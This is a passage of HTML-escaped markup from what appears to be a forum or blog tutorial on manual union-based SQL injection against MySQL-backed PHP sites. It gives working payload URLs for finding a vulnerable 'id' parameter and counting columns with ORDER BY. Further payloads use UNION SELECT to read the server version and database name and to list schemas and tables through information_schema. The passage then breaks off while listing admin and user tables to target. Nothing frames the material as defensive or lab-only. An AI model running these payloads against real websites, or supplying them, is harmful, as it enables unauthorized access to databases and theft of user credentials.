font-size: 13px; line-height: 18px; text-align: center;"&gt;1. Check the site, if it is vulnerable.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Enter ' behind the link&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1'&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If something like this pops up? Then it is vulnerable:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;2. Next up, we do the oder by statement. This wil show us how many columns we have.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+order+by+1--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+99--+- [!!error!!]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+2--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+3--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+4--+- [error]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Why do i do order by 99?&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;To check if we don't have to use a string injection.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If you do not get an error when u use order+by+99--+-&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Then we wil need to force an error.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+order+by+1--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+99--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+2--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+3--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1+order+by+4--+- [no error]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;As folowing:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Always place a ' behind the id number.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1'+order+by+1--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1'+order+by+99--+- [!!error!!]&lt;br /&gt;http://www.[site].com/page.php?id=1'+order+by+2--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1'+order+by+3--+- [no error]&lt;br /&gt;http://www.[site].com/page.php?id=1'+order+by+4--+- [error]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now we had this part. Lets move on to the union statement.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We know we have 3 columns now.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;[attention]If, you force an error! Never forget to use the ' behind the id number.[attention]&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;3. Union Select.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,2,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now there wil popup some numbers in the content of the site.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets say, i see a big 2 in the middle of my site.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;That means we have a vulnerable column.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We wil check version now.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,version(),3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If that dous not work do this:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,@@version,3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;You wil see the mysql version now.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;We always want it to be 5.x.x or more!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Not lower then 5 if it is give up.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets say mine is: 5.0.92 - community&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;That means im readdy to roll.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;4. Select database name:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(database()),3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Or simply do:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,database(),3--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If you want to find all the database's? is some cases a site has more then 1!&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;do this:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(schema_name),3+from+information_schema​.schemata--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets say my database is caled "db_1" no quotes.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This line asks the database which name it has.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;The group_concat is a line we use to select annything we need.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: green; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;5. Select table names:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;The group_concat statementh has a max length of 1024 characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;If we want to find all tables you could do this manually using concat() and a limit.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://www.[site].com/page.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.​tables+where+table_schema=database()+limit+0,1--+-&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;keep increasing that limit untill you have all tables.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Now you should have a list whit alot of names in there.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we select what we need.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Lets check for:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;User"s", admin"s"&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;administrator"s", member"s"&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;tbladmin"s",tblmember"s"&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;tbluser"s",tbladministrator"s"&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span 